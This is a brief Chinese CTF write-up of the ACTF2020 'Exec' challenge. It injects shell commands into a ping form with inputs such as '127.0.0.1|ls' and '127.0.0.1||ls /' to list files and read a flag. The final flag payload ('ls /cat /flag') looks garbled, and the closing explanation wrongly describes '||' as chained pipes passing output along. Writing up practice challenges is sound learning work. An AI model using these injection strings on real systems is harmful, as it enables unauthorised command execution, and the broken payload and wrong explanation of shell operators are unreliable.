ACTF2020新生赛-Exec

时间:2021-03-08 13:10:12   收藏:0   阅读:0

打开靶机
随便ping一下

技术图片

 

使用命令管道符 | 列出文件

127.0.0.1|ls

技术图片

 

只有一个index.php文件,查看一下目录(居然没过滤!)

 

127.0.0.1||ls /

 

技术图片

 

直接拿走flag就是了

127.0.0.1||ls /cat /flag                                 //注意空格

 

技术图片

 

知识点:
管道符的使用:
连续使用管道意味着第一个命令的输出会作为 第二个命令的输入,也就是返回上一级
一定注意空格!!

 

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!